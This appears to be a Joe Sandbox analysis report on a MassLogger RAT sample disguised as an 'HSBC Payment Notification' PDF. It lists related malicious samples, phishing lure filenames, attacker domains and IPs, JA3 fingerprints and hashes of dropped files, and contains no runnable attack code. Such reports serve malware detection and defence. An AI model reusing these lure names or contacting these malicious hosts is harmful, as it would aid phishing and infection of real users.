                                                                                                                                                          Number of injected processes analysed:0
                                                                                                                                                          Technologies:
                                                                                                                                                          • HCA enabled
                                                                                                                                                          • EGA enabled
                                                                                                                                                          • AMSI enabled
                                                                                                                                                          Analysis Mode:default
                                                                                                                                                          Analysis stop reason:Timeout
                                                                                                                                                          Sample name:HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe
                                                                                                                                                          Detection:MAL
                                                                                                                                                          Classification:mal100.spre.troj.spyw.expl.evad.winEXE@20/155@22/12
                                                                                                                                                          EGA Information:
                                                                                                                                                          • Successful, ratio: 88.9%
                                                                                                                                                          HCA Information:Failed
                                                                                                                                                          Cookbook Comments:
                                                                                                                                                          • Found application associated with file extension: .exe

                                                                                                                                                          Warnings

                                                                                                                                                          • Behavior information exceeds normal sizes, reducing to normal. Report will have missing behavior information.
                                                                                                                                                          • Exclude process from analysis (whitelisted): SearchFilterHost.exe, dllhost.exe, DiagnosticsHub.StandardCollector.Service.exe, SearchProtocolHost.exe, WMIADAP.exe, SIHClient.exe, VSSVC.exe, WmiApSrv.exe, SearchIndexer.exe, svchost.exe
                                                                                                                                                          • Excluded IPs from analysis (whitelisted): 13.107.246.63, 172.202.163.200
                                                                                                                                                          • Excluded domains from analysis (whitelisted): ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                                                                                          • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                                          • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                                                                                          • Report size getting too big, too many NtOpenFile calls found.
                                                                                                                                                          • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                          • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                          • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                                                                                                          • Report size getting too big, too many NtSetInformationFile calls found.
                                                                                                                                                          • Report size getting too big, too many NtWriteFile calls found.
                                                                                                                                                          • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                                                                                                                                                          Simulations

                                                                                                                                                          Behavior and APIs

                                                                                                                                                          TimeTypeDescription
                                                                                                                                                          03:26:07API Interceptor14x Sleep call for process: armsvc.exe modified
                                                                                                                                                          03:26:08API Interceptor1x Sleep call for process: HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe modified
                                                                                                                                                          03:26:11API Interceptor247198x Sleep call for process: perfhost.exe modified
                                                                                                                                                          03:26:21API Interceptor426384x Sleep call for process: RegSvcs.exe modified
                                                                                                                                                          03:26:45API Interceptor199x Sleep call for process: msdtc.exe modified

                                                                                                                                                          Joe Sandbox View / Context

                                                                                                                                                          IPs

                                                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                          13.248.148.254PURCHASE REQUIRED DETAILS 000487958790903403.exeGet hashmaliciousDBatLoader, MassLogger RAT, PureLog StealerBrowse
                                                                                                                                                          • ww12.przvgke.biz/fauopp?usid=18&utid=28672494417
                                                                                                                                                          Ziraat_Swift.htaGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                                                                          • ww12.przvgke.biz/jenyp?usid=26&utid=9204704395
                                                                                                                                                          http://begantotireo.xyzGet hashmaliciousUnknownBrowse
                                                                                                                                                          • ww38.begantotireo.xyz/favicon.ico
                                                                                                                                                          http://begantotireo.xyzGet hashmaliciousUnknownBrowse
                                                                                                                                                          • ww38.begantotireo.xyz/favicon.ico
                                                                                                                                                          http://football-booster.freevisit1.com/hs-football.php?live=Greendale%20vs%20Milwaukee%20LutheranGet hashmaliciousUnknownBrowse
                                                                                                                                                          • ww38.watchdogsecurity.online/favicon.ico
                                                                                                                                                          65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.exeGet hashmaliciousBdaejec, SocelarsBrowse
                                                                                                                                                          • ww12.icodeps.com/?usid=26&utid=7334446481
                                                                                                                                                          eqqjbbjMlt.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                          • ww38.fmoovies.to/
                                                                                                                                                          http://www.multipool.usGet hashmaliciousUnknownBrowse
                                                                                                                                                          • ww12.multipool.us/track.php?domain=multipool.us&caf=1&toggle=answercheck&answer=yes&uid=MTcyMDYyMjM5MS4yMjM1OjVjOTE5YWZmN2E1ZDQyNWY5MDE0Nzg0YzIwZGI1NzNiMGZkYzI3MWFiMWE0MGU0NzBjYjkyZjk4MmNlNjdjZDI6NjY4ZTlkMzczNjkwYg%3D%3D
                                                                                                                                                          http://pollyfill.ioGet hashmaliciousUnknownBrowse
                                                                                                                                                          • ww38.pollyfill.io/favicon.ico
                                                                                                                                                          http://simxtrackredirecttszz.pages.dev/Get hashmaliciousUnknownBrowse
                                                                                                                                                          • ww12.ngelit.com/favicon.ico
                                                                                                                                                          149.154.167.220DEC 2024 RFQ.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                            Itaxyhi.exeGet hashmaliciousPhemedrone StealerBrowse
                                                                                                                                                              https://google.com/amp/%F0%9F%84%B8%F0%9F%84%BF%F0%9F%84%B5%F0%9F%85%82.%E2%93%98%E2%93%9E/ipfs/bafybeidf2ghv5vakeqlcqqvzfsett7uzseqmmutnuaestozqiouef2rq2y#XFrank.Albano@lcatterton.comGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                Confirm revised invoice to proceed with payment ASAP.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                                                                  17338478743bbe929069f09b2fd43b475a3f9c5d7b9e72f9a2a5695318d73f4c494b80d40d501.dat-decoded.exeGet hashmaliciousSugarDump, XWormBrowse
                                                                                                                                                                    Bank Swift and SOA PRN0072700314159453_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                                                                      HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                                                        ST07933.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                                                          fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                            Hesap_Hareketleri_10122024_html.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                              44.221.84.105HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                                                              • saytjshyf.biz/peioi
                                                                                                                                                                              PURCHASE REQUIRED DETAILS 000487958790903403.exeGet hashmaliciousDBatLoader, MassLogger RAT, PureLog StealerBrowse
                                                                                                                                                                              • npukfztj.biz/cbecuogqej
                                                                                                                                                                              Ziraat_Swift.htaGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                                                                                              • saytjshyf.biz/bkq
                                                                                                                                                                              invoice_96.73.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                              • jhvzpcfg.biz/tgcwttfqletfhyq
                                                                                                                                                                              Order SMG 201906 20190816order.pdf.scr.exeGet hashmaliciousAgentTesla, MassLogger RAT, PureLog StealerBrowse
                                                                                                                                                                              • hehckyov.biz/ircdert
                                                                                                                                                                              C6dAUcOA6M.exeGet hashmaliciousAgentTesla, DBatLoader, PureLog StealerBrowse
                                                                                                                                                                              • hehckyov.biz/xc
                                                                                                                                                                              PO #09465610_GQ 003745_SO-242000846.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                                                                                              • saytjshyf.biz/xyvnmtdiyfgocm
                                                                                                                                                                              IBKB.vbsGet hashmaliciousAgentTesla, DBatLoader, PureLog StealerBrowse
                                                                                                                                                                              • jhvzpcfg.biz/qehuuaxgtrfd
                                                                                                                                                                              Ziraat_Bankasi_Swift_Mesaji_BXB04958T.cmdGet hashmaliciousAgentTesla, DBatLoader, PureLog StealerBrowse
                                                                                                                                                                              • hehckyov.biz/of
                                                                                                                                                                              Ziraat_Bankasi_Swift_Mesaji_DXB04958T.cmdGet hashmaliciousAgentTesla, DBatLoader, PureLog StealerBrowse
                                                                                                                                                                              • hehckyov.biz/sdgvcmfo

                                                                                                                                                                              Domains

                                                                                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                              przvgke.bizRFQ_PO N89397-GM7287-Order.bat.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                                                                                              • 172.234.222.138
                                                                                                                                                                              invoice_96.73.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                              • 172.234.222.143
                                                                                                                                                                              Order SMG 201906 20190816order.pdf.scr.exeGet hashmaliciousAgentTesla, MassLogger RAT, PureLog StealerBrowse
                                                                                                                                                                              • 172.234.222.143
                                                                                                                                                                              C6dAUcOA6M.exeGet hashmaliciousAgentTesla, DBatLoader, PureLog StealerBrowse
                                                                                                                                                                              • 172.234.222.143
                                                                                                                                                                              PO #09465610_GQ 003745_SO-242000846.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                                                                                              • 172.234.222.143
                                                                                                                                                                              IBKB.vbsGet hashmaliciousAgentTesla, DBatLoader, PureLog StealerBrowse
                                                                                                                                                                              • 172.234.222.143
                                                                                                                                                                              Ziraat_Bankasi_Swift_Mesaji_BXB04958T.cmdGet hashmaliciousAgentTesla, DBatLoader, PureLog StealerBrowse
                                                                                                                                                                              • 172.234.222.143
                                                                                                                                                                              vjaxhpbji.bizHSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                                                              • 82.112.184.197
                                                                                                                                                                              PURCHASE REQUIRED DETAILS 000487958790903403.exeGet hashmaliciousDBatLoader, MassLogger RAT, PureLog StealerBrowse
                                                                                                                                                                              • 82.112.184.197
                                                                                                                                                                              Ziraat_Swift.htaGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                                                                                              • 82.112.184.197
                                                                                                                                                                              RFQ_PO N89397-GM7287-Order.bat.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                                                                                              • 82.112.184.197
                                                                                                                                                                              invoice_96.73.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                              • 82.112.184.197
                                                                                                                                                                              Order SMG 201906 20190816order.pdf.scr.exeGet hashmaliciousAgentTesla, MassLogger RAT, PureLog StealerBrowse
                                                                                                                                                                              • 82.112.184.197
                                                                                                                                                                              C6dAUcOA6M.exeGet hashmaliciousAgentTesla, DBatLoader, PureLog StealerBrowse
                                                                                                                                                                              • 82.112.184.197
                                                                                                                                                                              PO #09465610_GQ 003745_SO-242000846.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                                                                                              • 82.112.184.197
                                                                                                                                                                              IBKB.vbsGet hashmaliciousAgentTesla, DBatLoader, PureLog StealerBrowse
                                                                                                                                                                              • 82.112.184.197
                                                                                                                                                                              Ziraat_Bankasi_Swift_Mesaji_BXB04958T.cmdGet hashmaliciousAgentTesla, DBatLoader, PureLog StealerBrowse
                                                                                                                                                                              • 82.112.184.197
                                                                                                                                                                              ssbzmoy.bizRequest for Quotation.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                              • 18.141.10.107
                                                                                                                                                                              HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                                                              • 18.141.10.107
                                                                                                                                                                              PURCHASE REQUIRED DETAILS 000487958790903403.exeGet hashmaliciousDBatLoader, MassLogger RAT, PureLog StealerBrowse
                                                                                                                                                                              • 18.141.10.107
                                                                                                                                                                              RFQ _ Virtue 054451000085.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                              • 18.141.10.107
                                                                                                                                                                              Ziraat_Swift.htaGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                                                                                              • 18.141.10.107
                                                                                                                                                                              RFQ_PO N89397-GM7287-Order.bat.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                                                                                              • 18.141.10.107
                                                                                                                                                                              Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exeGet hashmaliciousAgentTesla, MassLogger RAT, PureLog StealerBrowse
                                                                                                                                                                              • 18.141.10.107
                                                                                                                                                                              invoice_96.73.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                              • 18.141.10.107
                                                                                                                                                                              Order SMG 201906 20190816order.pdf.scr.exeGet hashmaliciousAgentTesla, MassLogger RAT, PureLog StealerBrowse
                                                                                                                                                                              • 18.141.10.107
                                                                                                                                                                              C6dAUcOA6M.exeGet hashmaliciousAgentTesla, DBatLoader, PureLog StealerBrowse
                                                                                                                                                                              • 18.141.10.107
                                                                                                                                                                              knjghuig.bizHSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                                                              • 18.141.10.107
                                                                                                                                                                              PURCHASE REQUIRED DETAILS 000487958790903403.exeGet hashmaliciousDBatLoader, MassLogger RAT, PureLog StealerBrowse
                                                                                                                                                                              • 18.141.10.107
                                                                                                                                                                              Ziraat_Swift.htaGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                                                                                              • 18.141.10.107
                                                                                                                                                                              invoice_96.73.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                              • 18.141.10.107
                                                                                                                                                                              Order SMG 201906 20190816order.pdf.scr.exeGet hashmaliciousAgentTesla, MassLogger RAT, PureLog StealerBrowse
                                                                                                                                                                              • 18.141.10.107
                                                                                                                                                                              C6dAUcOA6M.exeGet hashmaliciousAgentTesla, DBatLoader, PureLog StealerBrowse
                                                                                                                                                                              • 18.141.10.107
                                                                                                                                                                              PO #09465610_GQ 003745_SO-242000846.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                                                                                              • 18.141.10.107
                                                                                                                                                                              IBKB.vbsGet hashmaliciousAgentTesla, DBatLoader, PureLog StealerBrowse
                                                                                                                                                                              • 18.141.10.107
                                                                                                                                                                              Ziraat_Bankasi_Swift_Mesaji_BXB04958T.cmdGet hashmaliciousAgentTesla, DBatLoader, PureLog StealerBrowse
                                                                                                                                                                              • 18.141.10.107

                                                                                                                                                                              ASNs

                                                                                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                              ORACLE-BMC-31898USConfirm revised invoice to proceed with payment ASAP.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                                                                              • 193.122.6.168
                                                                                                                                                                              Josho.ppc.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                              • 140.238.49.71
                                                                                                                                                                              Malzeme #U0130stek Formu_12102024.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                              • 193.122.130.0
                                                                                                                                                                              Request for quote.docGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                                                              • 158.101.44.242
                                                                                                                                                                              REQUEST FOR QUOATION AND PRICES 0108603076-24_pdf.exeGet hashmaliciousGuLoaderBrowse
                                                                                                                                                                              • 193.122.6.168
                                                                                                                                                                              Bank Swift and SOA PRN0072700314159453_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                                                                              • 193.122.6.168
                                                                                                                                                                              HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                                                              • 193.122.6.168
                                                                                                                                                                              fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                              • 193.122.130.0
                                                                                                                                                                              New_Order_List.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                                                              • 193.122.6.168
                                                                                                                                                                              Request for Quotation_10.12.2024.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                                                              • 158.101.44.242
                                                                                                                                                                              TELEGRAMRUDEC 2024 RFQ.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                              • 149.154.167.220
                                                                                                                                                                              Itaxyhi.exeGet hashmaliciousPhemedrone StealerBrowse
                                                                                                                                                                              • 149.154.167.220
                                                                                                                                                                              https://google.com/amp/%F0%9F%84%B8%F0%9F%84%BF%F0%9F%84%B5%F0%9F%85%82.%E2%93%98%E2%93%9E/ipfs/bafybeidf2ghv5vakeqlcqqvzfsett7uzseqmmutnuaestozqiouef2rq2y#XFrank.Albano@lcatterton.comGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                              • 149.154.167.220
                                                                                                                                                                              Confirm revised invoice to proceed with payment ASAP.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                                                                              • 149.154.167.220
                                                                                                                                                                              17338478743bbe929069f09b2fd43b475a3f9c5d7b9e72f9a2a5695318d73f4c494b80d40d501.dat-decoded.exeGet hashmaliciousSugarDump, XWormBrowse
                                                                                                                                                                              • 149.154.167.220
                                                                                                                                                                              Bank Swift and SOA PRN0072700314159453_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                                                                              • 149.154.167.220
                                                                                                                                                                              HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                                                              • 149.154.167.220
                                                                                                                                                                              ST07933.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                                                              • 149.154.167.220
                                                                                                                                                                              fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                              • 149.154.167.220
                                                                                                                                                                              Hesap_Hareketleri_10122024_html.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                              • 149.154.167.220
                                                                                                                                                                              AMAZON-AESUShttps://zsuqwplt.cdrj.com.br/bfackjemFpbmFiLmFscmFobWFAZWphZGFoLmFlqmgtsjGet hashmaliciousUnknownBrowse
                                                                                                                                                                              • 35.173.69.207
                                                                                                                                                                              http://www.topbuildersolutions.net/clickthrough.aspx?rurl=https://search.app/?link=https://ZSUQWPLT.%63%64%72%6A%2E%63%6F%6D%2E%62%72%2FbfackjemFpbmFiLmFscmFobWFAZWphZGFoLmFlqmgtsj&eid=4070Get hashmaliciousUnknownBrowse
                                                                                                                                                                              • 54.196.244.37
                                                                                                                                                                              http://www.topbuildersolutions.net/clickthrough.aspx?rurl=https://search.app/?link=https://ARIQNEUB.cdrj.com.br%2Fxpkjxic2FidS5qb2huQGp1bWVpcmFoLmNvbQ==nishhe&eid=4070Get hashmaliciousUnknownBrowse
                                                                                                                                                                              • 35.173.69.207
                                                                                                                                                                              https://login.hr-internal.co/27553be9ed867726?l=50Get hashmaliciousUnknownBrowse
                                                                                                                                                                              • 3.5.68.128
                                                                                                                                                                              EFT Remittance_(Deerequipment)CQDM.htmlGet hashmaliciousUnknownBrowse
                                                                                                                                                                              • 54.156.21.112
                                                                                                                                                                              https://cbthz04.na1.hs-sales-engage.com/Ctc/WX+23284/cbtHZ04/JlY2-6qcW95jsWP6lZ3mVW5xSkdC387hZlVGwpQc3P-q7wW4XgB4f44hCn1W3xYp5D6c1ttLW5FlJm432C9CFN1DvHyz7sRM3W1xbpQP3rjw57VdgQ8b5y5ncrN49hcz4pvY25W96rvby79_LjyW2hcbt-9lVY_PW61b5ZB17S04cW1Q1Z0m1qr_XnW4-Nvh_3JShBfW6ZlQ2B7-rTd7W5m54Pt4FXHVhN8f7LcVPRggDW6t0wZX12kCc8W8SWxd-65BfMKN89z7Dpr6bFRW62hqfp7800yqW6mjxRN41FPzSV9Cmrg5cL__SW36PjDN1zwkS6W21jP9H8v9kL6W995dJp10hcCRVsGjCC5n0FZjN7sg51mKQ1rDW15tQ1c3HKBShW818lp-6tdDqnf2cjw2s04Get hashmaliciousUnknownBrowse
                                                                                                                                                                              • 3.94.50.129
                                                                                                                                                                              Josho.ppc.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                              • 44.221.119.255
                                                                                                                                                                              hax.x86.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                              • 18.211.48.222
                                                                                                                                                                              hax.m68k.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                              • 18.209.81.116
                                                                                                                                                                              hax.arm.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                              • 54.242.22.180
                                                                                                                                                                              AMAZON-02UShttps://advertising-case-id419348.d1yaxxd8bf42y5.amplifyapp.com/Get hashmaliciousUnknownBrowse
                                                                                                                                                                              • 108.158.75.45
                                                                                                                                                                              arm7.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                              • 34.249.145.219
                                                                                                                                                                              sh4.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                              • 54.171.230.55
                                                                                                                                                                              x86.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                              • 54.171.230.55
                                                                                                                                                                              6dKYHqbvOm.exeGet hashmaliciousNjratBrowse
                                                                                                                                                                              • 35.158.159.254
                                                                                                                                                                              la.bot.sparc.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                              • 54.171.230.55
                                                                                                                                                                              la.bot.mips.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                              • 54.171.230.55
                                                                                                                                                                              la.bot.arm.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                              • 54.171.230.55
                                                                                                                                                                              CJE003889.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                              • 13.228.81.39
                                                                                                                                                                              http://dcr0eadbm64ph.cloudfront.net/IDCVt99WXiQU.exeGet hashmaliciousPoisonivyBrowse
                                                                                                                                                                              • 54.200.239.173

                                                                                                                                                                              JA3 Fingerprints

                                                                                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                              54328bd36c14bd82ddaa0c04b25ed9adDEC 2024 RFQ.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                              • 172.67.177.134
                                                                                                                                                                              Itaxyhi.exeGet hashmaliciousPhemedrone StealerBrowse
                                                                                                                                                                              • 172.67.177.134
                                                                                                                                                                              file.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                                                              • 172.67.177.134
                                                                                                                                                                              Confirm revised invoice to proceed with payment ASAP.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                                                                              • 172.67.177.134
                                                                                                                                                                              REQUEST FOR QUOATION AND PRICES 0108603076-24_pdf.exeGet hashmaliciousGuLoaderBrowse
                                                                                                                                                                              • 172.67.177.134
                                                                                                                                                                              Bank Swift and SOA PRN0072700314159453_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                                                                              • 172.67.177.134
                                                                                                                                                                              HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                                                              • 172.67.177.134
                                                                                                                                                                              ST07933.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                                                              • 172.67.177.134
                                                                                                                                                                              fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg docx .exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                              • 172.67.177.134
                                                                                                                                                                              New_Order_List.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                                                              • 172.67.177.134
                                                                                                                                                                              3b5074b1b5d032e5620f69f9f700ff0eQUOTATION#08670.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                              • 149.154.167.220
                                                                                                                                                                              DEC 2024 RFQ.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                              • 149.154.167.220
                                                                                                                                                                              apDMcnqqWs.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                              • 149.154.167.220
                                                                                                                                                                              e8YDxjwJiT.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                              • 149.154.167.220
                                                                                                                                                                              TlNDyT2f5c.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                              • 149.154.167.220
                                                                                                                                                                              Itaxyhi.exeGet hashmaliciousPhemedrone StealerBrowse
                                                                                                                                                                              • 149.154.167.220
                                                                                                                                                                              Aclatis tool.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                              • 149.154.167.220
                                                                                                                                                                              Aclatis tool.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                              • 149.154.167.220
                                                                                                                                                                              Confirm revised invoice to proceed with payment ASAP.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                                                                              • 149.154.167.220

                                                                                                                                                                              Dropped Files

                                                                                                                                                                              No context

                                                                                                                                                                              Created / dropped Files

                                                                                                                                                                              C:\Program Files (x86)\AutoIt3\Au3Check.exe

                                                                                                                                                                              Download File
                                                                                                                                                                              Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                              File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):1508864
                                                                                                                                                                              Entropy (8bit):4.874504526124143
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:24576:aHCAR0it/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:aCAhLNiXicJFFRGNzj3
                                                                                                                                                                              MD5:DBCBBFDADE8D1C9A7B26F9A182EF5A9D
                                                                                                                                                                              SHA1:C0965F7D2843DD912911BE9E30B790E359732CFC
                                                                                                                                                                              SHA-256:5A30BE768A45D5FEAD76C219DC29B2BE9F9FD311CC0AC06D8D86D2430C427FD8
                                                                                                                                                                              SHA-512:83874AF57A4196DFCE06B6726C35D541E47B83E514CF3675054C1D3377836B52581336BB274ED7DA6B610C8D0B216EF204FD72C416B72684E1248E02F0F0B130
                                                                                                                                                                              Malicious:true
                                                                                                                                                                              Antivirus:
                                                                                                                                                                              • Antivirus: Avira, Detection: 100%
                                                                                                                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                              Reputation:low
                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........S.~.2.-.2.-.2.-n.G-.2.-n.E-J2.-n.D-.2.-.Z.,.2.-.Z.,.2.-.Z.,.2.-.J%-.2.-.2.-.2.-.[.,.2.-.[I-.2.-.2!-.2.-.[.,.2.-Rich.2.-........................PE..L...g.(c.....................6......&........0....@........................................................................,b..<....p...............................L..8............................L..@............0..,............................text............................... ..`.rdata...8...0...:..."..............@..@.data........p.......\..............@....rsrc....`...p.......f..............@...................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                              C:\Program Files (x86)\AutoIt3\Au3Info.exe

                                                                                                                                                                              Download File
                                                                                                                                                                              Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):1450496
                                                                                                                                                                              Entropy (8bit):4.816181180123465
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:24576:1C/Kgw/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:NLNiXicJFFRGNzj3
                                                                                                                                                                              MD5:992BFDCDC47C785EFB6D415557204BD1
                                                                                                                                                                              SHA1:A5C7928689CC1FCE0864A9456247DA9250D5B60F
                                                                                                                                                                              SHA-256:318796B39C057826C392619CC327CA1887EF474FD4759CC1D1D79EC596ED286D
                                                                                                                                                                              SHA-512:9249EF7BEE9075F6A8635FCC9302303B4B8C735C27179D7B9471BB36132480C9C1DE5F7AB7E7A8C81B0130F48CC1D01E45C6C3C5BF26142BCA26DCE9BE414DBD
                                                                                                                                                                              Malicious:true
                                                                                                                                                                              Antivirus:
                                                                                                                                                                              • Antivirus: Avira, Detection: 100%
                                                                                                                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........jZ..9Z..9Z..9...9Q..9...9%..9...9B..9...8r..9...8K..9...8H..9S.x9W..9Z..9..9...8]..9...9[..9Z.|9[..9...8[..9RichZ..9........PE..L...C.(c.........."......:...........\.......P....@...........................-.............................................$...........0..............................8...............................@............P...............................text...19.......:.................. ..`.rdata...|...P...~...>..............@..@.data...............................@....rsrc...0...........................@..@.reloc...p...`.......r..............@...........................................................................................................................................................................................................................................................................................................

                                                                                                                                                                              C:\Program Files (x86)\AutoIt3\Au3Info_x64.exe

                                                                                                                                                                              Download File
                                                                                                                                                                              Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                              File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):1469952
                                                                                                                                                                              Entropy (8bit):4.815396117315849
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:24576:xKdHx/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:sdRLNiXicJFFRGNzj3
                                                                                                                                                                              MD5:D3B6F2DBE813FAB1527E57BF44649E70
                                                                                                                                                                              SHA1:18C43FF0B908F535DCAA846F2C4FD5FAF630334E
                                                                                                                                                                              SHA-256:EF2111B59D3A4C255C6335D49E644790685A96AF67025758EAB96A5D815A18CE
                                                                                                                                                                              SHA-512:CB1B902C8BC2FCD54BF31EBF877ED43E627243748F900FFE137DA0BE730019FFB4C6FC5855509EFA894E97CC3E819DE0EB08238306D4B8AB55789285F10D5935
                                                                                                                                                                              Malicious:true
